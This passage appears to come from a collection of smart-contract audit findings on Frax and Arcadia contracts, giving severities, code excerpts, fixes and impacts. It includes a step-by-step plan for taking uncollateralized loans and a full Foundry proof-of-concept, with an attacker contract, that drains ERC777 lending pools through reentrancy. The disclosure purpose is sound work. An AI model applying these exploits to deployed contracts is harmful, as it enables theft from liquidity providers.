redemptionQueueState;\\n RedemptionQueueAccounting memory _redemptionQueueAccounting = redemptionQueueAccounting;\\n\\n // Calculations: redemption fee\\n uint120 _redemptionFeeAmount = ((uint256(_amountToRedeem) * _redemptionQueueState.redemptionFee) /\\n FEE_PRECISION).toUint120();\\n\\n // Calculations: amount of ETH owed to the user\\n uint120 _amountEtherOwedToUser = _amountToRedeem - _redemptionFeeAmount;\\n\\n // Calculations: increment ether liabilities by the amount of ether owed to the user\\n _redemptionQueueAccounting.etherLiabilities += uint128(_amountEtherOwedToUser);\\n\\n // Calculations: increment unclaimed fees by the redemption fee taken\\n _redemptionQueueAccounting.unclaimedFees += _redemptionFeeAmount;\\n\\n // Calculations: maturity timestamp\\n uint64 _maturityTimestamp = uint64(block.timestamp) + _redemptionQueueState.queueLengthSecs;\\n\\n // Effects: Initialize the redemption ticket NFT information\\n nftInformation[_redemptionQueueState.nextNftId] = RedemptionQueueItem({\\n amount: _amountEtherOwedToUser,\\n maturity: _maturityTimestamp,\\n hasBeenRedeemed: false,\\n earlyExitFee: _redemptionQueueState.earlyExitFee\\n });\\n```\\n
Ensure that the protocol team and its users are aware of the risks of such an event and develop a contingency plan to manage it.
Users unable to withdraw their assets. Loss of assets for the victim.
```\\nFile: FraxEtherRedemptionQueue.sol\\n /// @notice Sets the fee for redeeming\\n /// @param _newFee New redemption fee given in percentage terms, using 1e6 precision\\n function setRedemptionFee(uint64 _newFee) external {\\n _requireSenderIsTimelock();\\n if (_newFee > FEE_PRECISION) revert ExceedsMaxRedemptionFee(_newFee, FEE_PRECISION);\\n\\n emit SetRedemptionFee({ oldRedemptionFee: redemptionQueueState.redemptionFee, newRedemptionFee: _newFee });\\n\\n redemptionQueueState.redemptionFee = _newFee;\\n }\\n```\\n
SFrxETHAdapter redemptionQueue waiting period can DOS adapter functions
medium
The waiting period between `rebalancer` address making a withdrawal request and the withdrawn funds being ready to claim from `FraxEtherRedemptionQueue` is extremely long which can lead to a significant period of time where some of the protocol's functions are either unusable or work in a diminished capacity.\\nIn FraxEtherRedemptionQueue.sol; the Queue wait time is stored in the state struct `redemptionQueueState` as `redemptionQueueState.queueLengthSecs` and is curently set to `1_296_000 Seconds` or 15 Days; as recently as January however it was at `1_555_200 Seconds` or `18 Days`. View current setting by calling `redemptionQueueState()` here.\\n`BaseLSTAdapter::requestWithdrawal()` is an essential function which helps to maintain `bufferEth` at a defined, healthy level. `bufferEth` is a facility which smooth running of redemptions and deposits.\\nFor redemptions; it allows users to redeem `underlying` without having to wait for any period of time. However, redemption amounts requested which are less than `bufferEth` will be rejected as can be seen below in `BaseLSTAdapter::prefundedRedeem()`. Further, there is nothing preventing `redemptions` from bringing `bufferEth` all the way to `0`.\\n```\\n function prefundedRedeem(address recipient) external virtual returns (uint256, uint256) {\\n // SOME CODE\\n\\n // If the buffer is insufficient, shares cannot be redeemed immediately\\n // Need to wait for the withdrawal to be completed and the buffer to be refilled.\\n> if (assets > bufferEthCache) revert InsufficientBuffer();\\n\\n // SOME CODE\\n }\\n```\\n\\nFor deposits; where `bufferEth` is too low, it keeps user `deposits` in the contract until a deposit is made which brings `bufferEth` above it's target, at which point it stakes. During this time, the `deposits`, which are kept in the adapter, do not earn any yield; making those funds unprofitable.\\n```\\n function prefundedDeposit() external nonReentrant returns (uint256, uint256) {\\n // SOME CODE\\n> if (targetBufferEth >= availableEth + queueEthCache) {\\n> bufferEth = availableEth.toUint128();\\n return (assets, shares);\\n }\\n // SOME CODE\\n }\\n```\\n
Consider adding a function allowing the rebalancer call `earlyBurnRedemptionTicketNft()` in `FraxEtherRedemptionQueue.sol` when there is a necessity. This will allow an immediate withdrawal for a fee of 0.5%; see function here
If the `SFrxETHAdapter` experiences a large net redemption, bringing `bufferEth` significantly below `targetBufferEth`, the rebalancer can be required to make a withdrawal request in order to replenish the buffer. However, this will be an ineffective action given the current, 15 Day waiting period. During the waiting period if `redemptions > deposits`, the `bufferEth` can be brought down to `0` which will mean a complete DOSing of the `prefundedRedeem()` function.\\nDuring the wait period too; if `redemptions >= deposits`, no new funds will be staked in `FRAX` so yields for users will decrease and may in turn lead to more redemptions.\\nThese conditions could also necessitate the immediate calling again of `requestWithdrawal()`, given that withdrawal requests can only bring `bufferEth` up to it's target level and not beyond and during the wait period there could be further redemptions.
```\\n function prefundedRedeem(address recipient) external virtual returns (uint256, uint256) {\\n // SOME CODE\\n\\n // If the buffer is insufficient, shares cannot be redeemed immediately\\n // Need to wait for the withdrawal to be completed and the buffer to be refilled.\\n> if (assets > bufferEthCache) revert InsufficientBuffer();\\n\\n // SOME CODE\\n }\\n```\\n
`AccountV1#flashActionByCreditor` can be used to drain assets from account without withdrawing
high
`AccountV1#flashActionByCreditor` is designed to allow atomic flash actions moving funds from the `owner` of the account. By making the account own itself, these arbitrary calls can be used to transfer `ERC721` assets directly out of the account. The assets being transferred from the account will still show as deposited on the account allowing it to take out loans from creditors without having any actual assets.\\nThe overview of the exploit are as follows:\\n```\\n1) Deposit ERC721\\n2) Set creditor to malicious designed creditor\\n3) Transfer the account to itself\\n4) flashActionByCreditor to transfer ERC721\\n 4a) account owns itself so _transferFromOwner allows transfers from account\\n 4b) Account is now empty but still thinks is has ERC721\\n5) Use malicious designed liquidator contract to call auctionBoughtIn\\n and transfer account back to attacker\\n7) Update creditor to legitimate creditor\\n8) Take out loan against nothing\\n9) Profit\\n```\\n\\nThe key to this exploit is that the account is able to be it's own `owner`. Paired with a maliciously designed `creditor` (creditor can be set to anything) `flashActionByCreditor` can be called by the attacker when this is the case.\\nAccountV1.sol#L770-L772\\n```\\nif (transferFromOwnerData.assets.length > 0) {\\n _transferFromOwner(transferFromOwnerData, actionTarget);\\n}\\n```\\n\\nIn these lines the `ERC721` token is transferred out of the account. The issue is that even though the token is transferred out, the `erc721Stored` array is not updated to reflect this change.\\nAccountV1.sol#L570-L572\\n```\\nfunction auctionBoughtIn(address recipient) external onlyLiquidator nonReentrant {\\n _transferOwnership(recipient);\\n}\\n```\\n\\nAs seen above `auctionBoughtIn` does not have any requirement besides being called by the `liquidator`. Since the `liquidator` is also malicious. It can then abuse this function to set the `owner` to any address, which allows the attacker to recover ownership of the account. Now the attacker has an account that still considers the `ERC721` token as owned but that token isn't actually present in the account.\\nNow the account creditor can be set to a legitimate pool and a loan taken out against no collateral at all.
The root cause of this issue is that the account can own itself. The fix is simple, make the account unable to own itself by causing transferOwnership to revert if `owner == address(this)`
Account can take out completely uncollateralized loans, causing massive losses to all lending pools.
```\\n1) Deposit ERC721\\n2) Set creditor to malicious designed creditor\\n3) Transfer the account to itself\\n4) flashActionByCreditor to transfer ERC721\\n 4a) account owns itself so _transferFromOwner allows transfers from account\\n 4b) Account is now empty but still thinks is has ERC721\\n5) Use malicious designed liquidator contract to call auctionBoughtIn\\n and transfer account back to attacker\\n7) Update creditor to legitimate creditor\\n8) Take out loan against nothing\\n9) Profit\\n```\\n
Reentrancy in flashAction() allows draining liquidity pools
high
It is possible to drain a liquidity pool/creditor if the pool's asset is an ERC777 token by triggering a reentrancy flow using flash actions.\\nThe following vulnerability describes a complex flow that allows draining any liquidity pool where the underlying asset is an ERC777 token. Before diving into the vulnerability, it is important to properly understand and highlight some concepts from Arcadia that are relevant in order to allow this vulnerability to take place:\\nFlash actions: flash actions in Arcadia operate in a similar fashion to flash loans. Any account owner will be able to borrow an arbitrary amount from the creditor without putting any collateral as long as the account remains in a healthy state at the end of execution. The following steps summarize what actually happens when `LendingPool.flashAction()` flow is triggered:\\nThe amount borrowed (plus fees) will be minted to the account as debt tokens. This means that the amount borrowed in the flash action will be accounted as debt during the whole `flashAction()` execution. If a flash action borrowing 30 tokens is triggered for an account that already has 10 tokens in debt, the debt balance of the account will increase to 40 tokens + fees.\\nBorrowed asset will be transferred to the `actionTarget`. The `actionTarget` is an arbitrary address passed as parameter in the `flashAction()`. It is important to be aware of the fact that transferring the borrowed funds is performed prior to calling `flashActionByCreditor()`, which is the function that will end up verifying the account's health state. This is the step where the reentrancy will be triggered by the `actionTarget`.\\nThe account's `flashActionByCreditor()` function is called. This is the last step in the execution function, where a health check for the account is performed (among other things).\\n// LendingPool.sol\\n\\nfunction flashAction(\\n uint256 amountBorrowed,\\n address account,\\n address `actionTarget`, \\n bytes calldata actionData,\\n bytes3 referrer\\n ) external whenBorrowNotPaused processInterests {\\n ... \\n\\n uint256 amountBorrowedWithFee = amountBorrowed + amountBorrowed.mulDivUp(originationFee, ONE_4);\\n\\n ...\\n \\n // Mint debt tokens to the Account, debt must be minted before the actions in the Account are performed.\\n _deposit(amountBorrowedWithFee, account);\\n\\n ...\\n\\n // Send Borrowed funds to the `actionTarget`.\\n asset.safeTransfer(actionTarget, amountBorrowed);\\n \\n // The Action Target will use the borrowed funds (optionally with additional assets withdrawn from the Account)\\n // to execute one or more actions (swap, deposit, mint...).\\n // Next the action Target will deposit any of the remaining funds or any of the recipient token\\n // resulting from the actions back into the Account.\\n // As last step, after all assets are deposited back into the Account a final health check is done:\\n // The Collateral Value of all assets in the Account is bigger than the total liabilities against the Account (including the debt taken during this function).\\n // flashActionByCreditor also checks that the Account indeed has opened a margin account for this Lending Pool.\\n {\\n uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);\\n if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();\\n }\\n \\n ... \\n }\\nCollateral value: Each creditor is configured with some risk parameters in the `Registry` contract. One of the risk parameters is the `minUsdValue`, which is the minimum USD value any asset must have when it is deposited into an account for the creditor to consider such collateral as valid. If the asset does not reach the `minUsdValue`, it will simply be accounted with a value of 0. For example: if the `minUsdValue` configured for a given creditor is 100 USD and we deposit an asset in our account worth 99 USD (let's say 99 USDT), the USDT collateral will be accounted as 0. This means that our USDT will be worth nothing at the eyes of the creditor. However, if we deposit one more USDT token into the account, our USD collateral value will increase to 100 USD, reaching the `minUsdValue`. Now, the creditor will consider our account's collateral to be worth 100 USD instead of 0 USD.\\nLiquidations: Arcadia liquidates unhealthy accounts using a dutch-auction model. When a liquidation is triggered via `Liquidator.liquidateAccount()` all the information regarding the debt and assets from the account will be stored in `auctionInformation_` , which maps account addresses to an `AuctionInformation` struct. An important field in this struct is the `assetShares`, which will store the relative value of each asset, with respect to the total value of the Account.\\nWhen a user wants to bid for an account in liquidation, the `Liquidator.bid()` function must be called. An important feature from this function is that it does not require the bidder to repay the loan in full (thus getting the full collateral in the account). Instead, the bidder can specify which collateral asset and amount wants to obtain back, and the contract will compute the amount of debt required to be repaid from the bidder for that amount of collateral. If the user wants to repay the full loan, all the collateral in the account will be specified by the bidder.\\nWith this background, we can now move on to describing the vulnerability in full.\\nInitially, we will create an account and deposit collateral whose value is in the limit of the configured `minUsdValue` (if the `minUsdValue` is 100 tokens, the ideal amount to have will be 100 tokens to maximize gains). We will see why this is required later. The account's collateral and debt status will look like this:\\n\\nThe next step after creating the account is to trigger a flash action. As mentioned in the introduction, the borrowed funds will be sent to the `actionTarget` (this will be a contract we create and control). An important requirement is that if the borrowed asset is an ERC777 token, we will be able to execute the ERC777 callback in our `actionTarget` contract, enabling us to gain control of the execution flow. Following our example, if we borrowed 200 tokens the account's status would look like this:\\n\\nOn receiving the borrowed tokens, the actual attack will begin. TheactionTarget will trigger the `Liquidator.liquidateAccount()` function to liquidate our own account. This is possible because the funds borrowed using the flash action are accounted as debt for our account (as we can see in the previous image, the borrowed amount greatly surpasses our account's collateral value) prior to executing the `actionTarget` ERC777 callback, making the account susceptible of being liquidated. Executing this function will start the auction process and store data relevant to the account and its debt in the `auctionInformation_` mapping.\\nAfter finishing the `liquidateAccount()` execution, the next step for the `actionTarget` is to place a bid for our own account auction calling `Liquidator.bid()`. The trick here is to request a small amount from the account's collateral in the `askedAssetAmounts` array (if we had 100 tokens as collateral in the account, we could ask for only 1). The small requested amount will make the computed `price` to pay for the bid by `_calculateBidPrice()` be really small so that we can maximize our gains. Another requirement will be to set the `endAuction_` parameter to `true` (we will see why later):\\n```\\n// Liquidator.sol\\n\\nfunction bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external nonReentrant {\\n AuctionInformation storage auctionInformation_ = auctionInformation[account];\\n if (!auctionInformation_.inAuction) revert LiquidatorErrors.NotForSale();\\n\\n // Calculate the current auction price of the assets being bought.\\n uint256 totalShare = _calculateTotalShare(auctionInformation_, askedAssetAmounts);\\n uint256 price = _calculateBidPrice(auctionInformation_, totalShare);\\n \\n // Transfer an amount of "price" in "Numeraire" to the LendingPool to repay the Accounts debt.\\n // The LendingPool will call a "transferFrom" from the bidder to the pool -> the bidder must approve the LendingPool.\\n // If the amount transferred would exceed the debt, the surplus is paid out to the Account Owner and earlyTerminate is True.\\n uint128 startDebt = auctionInformation_.startDebt;\\n bool earlyTerminate = ILendingPool(auctionInformation_.creditor).auctionRepay(\\n startDebt, auctionInformation_.minimumMargin, price, account, msg.sender\\n );\\n // rest of code\\n}\\n```\\n\\nAfter computing the small price to pay for the bid, theLendingPool.auctionRepay() will be called. Because we are repaying a really small amount from the debt, the `accountDebt <= amount` condition will NOT hold, so the only actions performed by `LendingPool.auctionRepay()` will be transferring the small amount of tokens to pay the bid, and `_withdraw()` (burn) the corresponding debt from the account (a small amount of debt will be burnt here because the bid amount is small). It is also important to note that the `earlyTerminate` flag will remain as false:\\n```\\n// LendingPool.sol\\n\\nfunction auctionRepay(uint256 startDebt, uint256 minimumMargin_, uint256 amount, address account, address bidder)\\n external\\n whenLiquidationNotPaused\\n onlyLiquidator \\n processInterests\\n returns (bool earlyTerminate)\\n {\\n // Need to transfer before burning debt or ERC777s could reenter.\\n // Address(this) is trusted -> no risk on re-entrancy attack after transfer.\\n asset.safeTransferFrom(bidder, address(this), amount);\\n\\n uint256 accountDebt = maxWithdraw(account); \\n if (accountDebt == 0) revert LendingPoolErrors.IsNotAnAccountWithDebt();\\n if (accountDebt <= amount) {\\n // The amount recovered by selling assets during the auction is bigger than the total debt of the Account.\\n // -> Terminate the auction and make the surplus available to the Account-Owner.\\n earlyTerminate = true;\\n unchecked {\\n _settleLiquidationHappyFlow(account, startDebt, minimumMargin_, bidder, (amount - accountDebt));\\n }\\n amount = accountDebt;\\n }\\n \\n _withdraw(amount, address(this), account); \\n\\n emit Repay(account, bidder, amount);\\n }\\n```\\n\\nAfter `LendingPool.auctionRepay()` , execution will go back to `Liquidator.bid()`. The account's `auctionBid()` function will then be called, which will transfer the 1 token requested by the bidder in the `askedAssetAmounts` parameter from the account's collateral to the bidder. This is the most important concept in the attack. Because 1 token is moving out from the account's collateral, the current collateral value from the account will be decreased from 100 USD to 99 USD, making the collateral value be under the minimum `minUsdValue` amount of 100 USD, and thus making the collateral value from the account go straight to 0 at the eyes of the creditor:\\n\\nBecause the `earlyTerminate` was NOT set to `true` in `LendingPool.auctionRepay()`, the `if (earlyTerminate)` condition will be skipped, going straight to evaluate the `else if (endAuction_)` condition . Because we set theendAuction_ parameter to `true` when calling the `bid()` function, `_settleAuction()` will execute.\\n```\\n// Liquidator.sol\\n\\nfunction bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external nonReentrant {\\n // rest of code\\n \\n // Transfer the assets to the bidder.\\n IAccount(account).auctionBid(\\n auctionInformation_.assetAddresses, auctionInformation_.assetIds, askedAssetAmounts, msg.sender\\n );\\n // If all the debt is repaid, the auction must be ended, even if the bidder did not set endAuction to true.\\n if (earlyTerminate) {\\n // Stop the auction, no need to do a health check for the account since it has no debt anymore.\\n _endAuction(account);\\n }\\n // If not all debt is repaid, the bidder can still earn a termination incentive by ending the auction\\n // if one of the conditions to end the auction is met.\\n // "_endAuction()" will silently fail without reverting, if the auction was not successfully ended.\\n else if (endAuction_) {\\n if (_settleAuction(account, auctionInformation_)) _endAuction(account);\\n } \\n }\\n```\\n\\n`_settleAuction()` is where the final steps of the attack will take place. Because we made the collateral value of our account purposely decrease from the `minUsdValue`, `_settleAuction` will interpret that all collateral has been sold, and the `else if (collateralValue == 0)` will evaluate to true, making the creditor's `settleLiquidationUnhappyFlow()` function be called:\\n```\\nfunction _settleAuction(address account, AuctionInformation storage auctionInformation_)\\n internal\\n returns (bool success)\\n {\\n // Cache variables.\\n uint256 startDebt = auctionInformation_.startDebt;\\n address creditor = auctionInformation_.creditor;\\n uint96 minimumMargin = auctionInformation_.minimumMargin;\\n\\n uint256 collateralValue = IAccount(account).getCollateralValue();\\n uint256 usedMargin = IAccount(account).getUsedMargin();\\n \\n // Check the different conditions to end the auction.\\n if (collateralValue >= usedMargin || usedMargin == minimumMargin) { \\n // Happy flow: Account is back in a healthy state.\\n // An Account is healthy if the collateral value is equal or greater than the used margin.\\n // If usedMargin is equal to minimumMargin, the open liabilities are 0 and the Account is always healthy.\\n ILendingPool(creditor).settleLiquidationHappyFlow(account, startDebt, minimumMargin, msg.sender);\\n } else if (collateralValue == 0) {\\n // Unhappy flow: All collateral is sold.\\n ILendingPool(creditor).settleLiquidationUnhappyFlow(account, startDebt, minimumMargin, msg.sender);\\n }\\n // rest of code\\n \\n \\n return true;\\n }\\n```\\n\\nExecuting the `settleLiquidationUnhappyFlow()` will burn ALL the remaining debt (balanceOf[account] will return all the remaining balance of debt tokens for the account), and the liquidation will be finished, calling `_endLiquidation()` and leaving the account with 99 tokens of collateral and a 0 amount of debt (and the `actionTarget` with ALL the borrowed funds taken from the flash action).\\n```\\n// LendingPool.sol\\n\\nfunction settleLiquidationUnhappyFlow(\\n address account,\\n uint256 startDebt,\\n uint256 minimumMargin_,\\n address terminator\\n ) external whenLiquidationNotPaused onlyLiquidator processInterests {\\n // rest of code\\n\\n // Any remaining debt that was not recovered during the auction must be written off.\\n // Depending on the size of the remaining debt, different stakeholders will be impacted.\\n uint256 debtShares = balanceOf[account];\\n uint256 openDebt = convertToAssets(debtShares);\\n uint256 badDebt;\\n // rest of code\\n\\n // Remove the remaining debt from the Account now that it is written off from the liquidation incentives/Liquidity Providers.\\n _burn(account, debtShares);\\n realisedDebt -= openDebt;\\n emit Withdraw(msg.sender, account, account, openDebt, debtShares);\\n\\n _endLiquidation();\\n\\n emit AuctionFinished(\\n account, address(this), startDebt, initiationReward, terminationReward, liquidationPenalty, badDebt, 0\\n );\\n }\\n```\\n\\nAfter the actionTarget's ERC777 callback execution, the execution flow will return to the initially called `flashAction()` function, and the final `IAccount(account).flashActionByCreditor()` function will be called, which will pass all the health checks due to the fact that all the debt from the account was burnt:\\n```\\n// LendingPool.sol\\n\\nfunction flashAction(\\n uint256 amountBorrowed,\\n address account,\\n address actionTarget, \\n bytes calldata actionData,\\n bytes3 referrer\\n ) external whenBorrowNotPaused processInterests {\\n \\n // rest of code \\n \\n // The Action Target will use the borrowed funds (optionally with additional assets withdrawn from the Account)\\n // to execute one or more actions (swap, deposit, mint// rest of code).\\n // Next the action Target will deposit any of the remaining funds or any of the recipient token\\n // resulting from the actions back into the Account.\\n // As last step, after all assets are deposited back into the Account a final health check is done:\\n // The Collateral Value of all assets in the Account is bigger than the total liabilities against the Account (including the debt taken during this function).\\n // flashActionByCreditor also checks that the Account indeed has opened a margin account for this Lending Pool.\\n {\\n uint256 accountVersion = IAccount(account).flashActionByCreditor(actionTarget, actionData);\\n if (!isValidVersion[accountVersion]) revert LendingPoolErrors.InvalidVersion();\\n }\\n \\n // rest of code \\n }\\n```\\n\\n```\\n// AccountV1.sol\\n\\nfunction flashActionByCreditor(address actionTarget, bytes calldata actionData)\\n external\\n nonReentrant\\n notDuringAuction\\n updateActionTimestamp\\n returns (uint256 accountVersion)\\n {\\n \\n // rest of code\\n\\n // Account must be healthy after actions are executed.\\n if (isAccountUnhealthy()) revert AccountErrors.AccountUnhealthy();\\n\\n // rest of code\\n }\\n```\\n\\nProof of Concept\\nThe following proof of concept illustrates how the previously described attack can take place. Follow the steps in order to reproduce it:\\nCreate a `ERC777Mock.sol` file in `lib/accounts-v2/test/utils/mocks/tokens` and paste the code found in this github gist.\\nImport the ERC777Mock and change the MockOracles, MockERC20 and Rates structs in `lib/accounts-v2/test/utils/Types.sol` to add an additional `token777ToUsd`, `token777` of type ERC777Mock and `token777ToUsd` rate:\\n`import "../utils/mocks/tokens/ERC777Mock.sol"; // <----- Import this\\n\\n...\\n\\nstruct MockOracles {\\n ArcadiaOracle stable1ToUsd;\\n ArcadiaOracle stable2ToUsd;\\n ArcadiaOracle token1ToUsd;\\n ArcadiaOracle token2ToUsd;\\n ArcadiaOracle token3ToToken4;\\n ArcadiaOracle token4ToUsd;\\n ArcadiaOracle token777ToUsd; // <----- Add this\\n ArcadiaOracle nft1ToToken1;\\n ArcadiaOracle nft2ToUsd;\\n ArcadiaOracle nft3ToToken1;\\n ArcadiaOracle sft1ToToken1;\\n ArcadiaOracle sft2ToUsd;\\n}\\n\\nstruct MockERC20 {\\n ERC20Mock stable1;\\n ERC20Mock stable2;\\n ERC20Mock token1;\\n ERC20Mock token2;\\n ERC20Mock token3;\\n ERC20Mock token4;\\n ERC777Mock token777; // <----- Add this\\n}\\n\\n...\\n\\nstruct Rates {\\n uint256 stable1ToUsd;\\n uint256 stable2ToUsd;\\n uint256 token1ToUsd;\\n uint256 token2ToUsd;\\n uint256 token3ToToken4;\\n uint256 token4ToUsd;\\n uint256 token777ToUsd; // <----- Add this\\n uint256 nft1ToToken1;\\n uint256 nft2ToUsd;\\n uint256 nft3ToToken1;\\n uint256 sft1ToToken1;\\n uint256 sft2ToUsd;\\n}`\\nReplace the contents inside `lib/accounts-v2/test/fuzz/Fuzz.t.sol` for the code found in this github gist.\\nTo finish the setup, replace the file found in `lending-v2/test/fuzz/Fuzz.t.sol` for the code found in this github gist.\\nFor the actual proof of concept, create a `Poc.t.sol` file in `test/fuzz/LendingPool` and paste the following code. The code contains the proof of concept test, as well as the action target implementation:\\n/**\\n * Created by Pragma Labs\\n * SPDX-License-Identifier: BUSL-1.1\\n */\\npragma solidity 0.8.22;\\n\\nimport { LendingPool_Fuzz_Test } from "./_LendingPool.fuzz.t.sol";\\n\\nimport { ActionData, IActionBase } from "../../../lib/accounts-v2/src/interfaces/IActionBase.sol";\\nimport { IPermit2 } from "../../../lib/accounts-v2/src/interfaces/IPermit2.sol";\\n\\n/// @notice Proof of Concept - Arcadia\\ncontract Poc is LendingPool_Fuzz_Test {\\n\\n /////////////////////////////////////////////////////////////////\\n // TEST CONTRACTS //\\n /////////////////////////////////////////////////////////////////\\n\\n ActionHandler internal actionHandler;\\n bytes internal callData;\\n\\n /////////////////////////////////////////////////////////////////\\n // SETUP //\\n /////////////////////////////////////////////////////////////////\\n\\n function setUp() public override {\\n // Setup pool test\\n LendingPool_Fuzz_Test.setUp();\\n\\n // Deploy action handler\\n vm.prank(users.creatorAddress);\\n actionHandler = new ActionHandler(address(liquidator), address(proxyAccount));\\n\\n // Set origination fee\\n vm.prank(users.creatorAddress);\\n pool.setOriginationFee(100); // 1%\\n\\n // Transfer some tokens to actiontarget to perform liquidation repayment and approve tokens to be transferred to pool \\n vm.startPrank(users.liquidityProvider);\\n mockERC20.token777.transfer(address(actionHandler), 1 ether);\\n mockERC20.token777.approve(address(pool), type(uint256).max);\\n\\n // Deposit 100 erc777 tokens into pool\\n vm.startPrank(address(srTranche));\\n pool.depositInLendingPool(100 ether, users.liquidityProvider);\\n assertEq(mockERC20.token777.balanceOf(address(pool)), 100 ether);\\n\\n // Approve creditor from actiontarget for bid payment\\n vm.startPrank(address(actionHandler));\\n mockERC20.token777.approve(address(pool), type(uint256).max);\\n\\n }\\n\\n /////////////////////////////////////////////////////////////////\\n // POC //\\n /////////////////////////////////////////////////////////////////\\n /// @notice Test exploiting the reentrancy vulnerability. \\n /// Prerequisites:\\n /// - Create an actionTarget contract that will trigger the attack flow using the ERC777 callback when receiving the \\n /// borrowed funds in the flash action.\\n /// - Have some liquidity deposited in the pool in order to be able to borrow it\\n /// Attack:\\n /// 1. Open a margin account in the creditor to be exploited.\\n /// 2. Deposit a small amount of collateral. This amount needs to be big enough to cover the `minUsdValue` configured\\n /// in the registry for the given creditor.\\n /// 3. Create the `actionData` for the account's `flashAction()` function. The data contained in it (withdrawData, transferFromOwnerData,\\n /// permit, signature and actionTargetData) can be empty, given that such data is not required for the attack.\\n /// 4. Trigger LendingPool.flashAction(). The execution flow will:\\n /// a. Mint the flash-actioned debt to the account\\n /// b. Send the borrowed funds to the action target\\n /// c. The action target will execute the ERC777 `tokensReceived()` callback, which will:\\n /// - Trigger Liquidator.liquidateAccount(), which will set the account in an auction state\\n /// - Trigger Liquidator.bid(). \\n \\n function testVuln_reentrancyInFlashActionEnablesStealingAllProtocolFunds(\\n uint128 amountLoaned,\\n uint112 collateralValue,\\n uint128 liquidity,\\n uint8 originationFee\\n ) public { \\n\\n //---------- STEP 1 ----------//\\n // Open a margin account\\n vm.startPrank(users.accountOwner);\\n proxyAccount.openMarginAccount(address(pool)); \\n \\n //---------- STEP 2 ----------//\\n // Deposit 1 stable token in the account as collateral.\\n // Note: The creditors's `minUsdValue` is set to 1 * 10 ** 18. Because\\n // value is converted to an 18-decimal number and the asset is pegged to 1 dollar,\\n // depositing an amount of 1 * 10 ** 6 is the actual minimum usd amount so that the \\n // account's collateral value is not considered as 0.\\n depositTokenInAccount(proxyAccount, mockERC20.stable1, 1 * 10 ** 6);\\n assertEq(proxyAccount.getCollateralValue(), 1 * 10 ** 18);\\n\\n //---------- STEP 3 ----------//\\n // Create empty action data. The action handler won't withdraw/deposit any asset from the account \\n // when the `flashAction()` callback in the account is triggered. Hence, action data will contain empty elements.\\n callData = _buildActionData();\\n\\n // Fetch balances from the action handler (who will receive all the borrowed funds from the flash action)\\n // as well as the pool. \\n // Action handler balance initially has 1 token of `token777` (given initially on deployment)\\n assertEq(mockERC20.token777.balanceOf(address(actionHandler)), 1 * 10 ** 18);\\n uint256 liquidityPoolBalanceBefore = mockERC20.token777.balanceOf(address(pool));\\n uint256 actionHandlerBalanceBefore = mockERC20.token777.balanceOf(address(actionHandler));\\n // Pool initially has 100 tokens of `token777` (deposited by the liquidity provider in setUp())\\n assertEq(mockERC20.token777.balanceOf(address(pool)), 100 * 10 ** 18);\\n\\n //---------- STEP 4 ----------//\\n // Step 4. Trigger the flash action.\\n vm.startPrank(users.accountOwner);\\n\\n pool.flashAction(100 ether , address(proxyAccount), address(actionHandler), callData, emptyBytes3);\\n vm.stopPrank();\\n \\n \\n //---------- FINAL ASSERTIONS ----------//\\n\\n // Action handler (who is the receiver of the borrowed funds in the flash action) has succesfully obtained 100 tokens from \\n //the pool, and in the end it has nearly 101 tokens (initially it had 1 token, plus the 100 tokens stolen \\n // from the pool minus the small amount required to pay for the bid)\\n assertGt(mockERC20.token777.balanceOf(address(actionHandler)), 100 * 10 ** 18);\\n\\n // On the other hand, pool has lost nearly all of its balance, only remaining the small amount paid from the \\n // action handler in order to bid\\n assertLt(mockERC20.token777.balanceOf(address(pool)), 0.05 * 10 ** 18);\\n \\n } \\n\\n /// @notice Internal function to build the `actionData` payload needed to execute the `flashActionByCreditor()` \\n /// callback when requesting a flash action\\n function _buildActionData() internal returns(bytes memory) {\\n ActionData memory emptyActionData;\\n address[] memory to;\\n bytes[] memory data;\\n bytes memory actionTargetData = abi.encode(emptyActionData, to, data);\\n IPermit2.PermitBatchTransferFrom memory permit;\\n bytes memory signature;\\n return abi.encode(emptyActionData, emptyActionData, permit, signature, actionTargetData);\\n }\\n}\\n\\n/// @notice ERC777Recipient interface\\ninterface IERC777Recipient {\\n \\n function tokensReceived(\\n address operator,\\n address from,\\n address to,\\n uint256 amount,\\n bytes calldata userData,\\n bytes calldata operatorData\\n ) external;\\n}\\n\\n /// @notice Liquidator interface\\ninterface ILiquidator {\\n function liquidateAccount(address account) external;\\n function bid(address account, uint256[] memory askedAssetAmounts, bool endAuction_) external;\\n}\\n\\n /// @notice actionHandler contract that will trigger the attack via ERC777's `tokensReceived()` callback\\ncontract ActionHandler is IERC777Recipient, IActionBase {\\n\\n ILiquidator public immutable liquidator;\\n address public immutable account;\\n uint256 triggered;\\n\\n constructor(address _liquidator, address _account) {\\n liquidator = ILiquidator(_liquidator);\\n account = _account;\\n } \\n\\n /// @notice ERC777 callback function\\n function tokensReceived(\\n address operator,\\n address from,\\n address to,\\n uint256 amount,\\n bytes calldata userData,\\n bytes calldata operatorData\\n ) external {\\n // Only trigger the callback once (avoid triggering it while receiving funds in the setup + when receiving final funds)\\n if(triggered == 1) {\\n triggered = 2;\\n liquidator.liquidateAccount(account);\\n uint256[] memory askedAssetAmounts = new uint256[](1);\\n askedAssetAmounts[0] = 1; // only ask for 1 wei of token so that we repay a small share of the debt\\n liquidator.bid(account, askedAssetAmounts, true);\\n }\\n unchecked{\\n triggered++;\\n }\\n }\\n\\n function executeAction(bytes calldata actionTargetData) external returns (ActionData memory) {\\n ActionData memory data;\\n return data;\\n }\\n\\n}\\nExecute the proof of concept with the following command (being inside the `lending-v2` folder): `forge test --mt testVuln_reentrancyInFlashActionEnablesStealingAllProtocolFunds`
This attack is possible because the `getCollateralValue()` function returns a 0 collateral value due to the `minUsdValue` mentioned before not being reached after executing the bid. The Liquidator's `_settleAuction()` function then believes the collateral held in the account is 0.\\nIn order to mitigate the issue, consider fetching the actual real collateral value inside `_settleAuction()` even if it is less than the `minUsdValue` held in the account, so that the function can properly check if the full collateral was sold or not.\\n```\\n// Liquidator.sol\\nfunction _settleAuction(address account, AuctionInformation storage auctionInformation_)\\n internal\\n returns (bool success)\\n {\\n // rest of code\\n\\n uint256 collateralValue = IAccount(account).getCollateralValue(); // <----- Fetch the REAL collateral value instead of reducing it to 0 if `minUsdValue` is not reached\\n \\n \\n // rest of code\\n }\\n```\\n
The impact for this vulnerability is high. All funds deposited in creditors with ERC777 tokens as the underlying asset can be drained.
